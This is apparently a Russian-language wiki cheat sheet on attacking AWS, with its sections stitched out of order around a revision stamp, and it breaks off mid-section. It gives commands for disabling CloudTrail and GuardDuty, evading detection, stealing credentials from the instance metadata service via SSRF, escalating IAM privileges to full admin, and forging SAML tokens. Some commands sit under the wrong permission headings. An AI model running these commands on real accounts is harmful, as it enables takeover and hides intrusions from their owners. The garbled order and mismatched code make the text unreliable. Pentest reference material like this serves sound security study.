s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-10-07T10:39:59Z

Drakylar: /* Службы */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:AddUserToGroup ====

Добавить пользователя в группу администраторов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name target_group --user-name my_username
</syntaxhighlight>

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Атаки ===

==== Критичные редактируемые поля ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
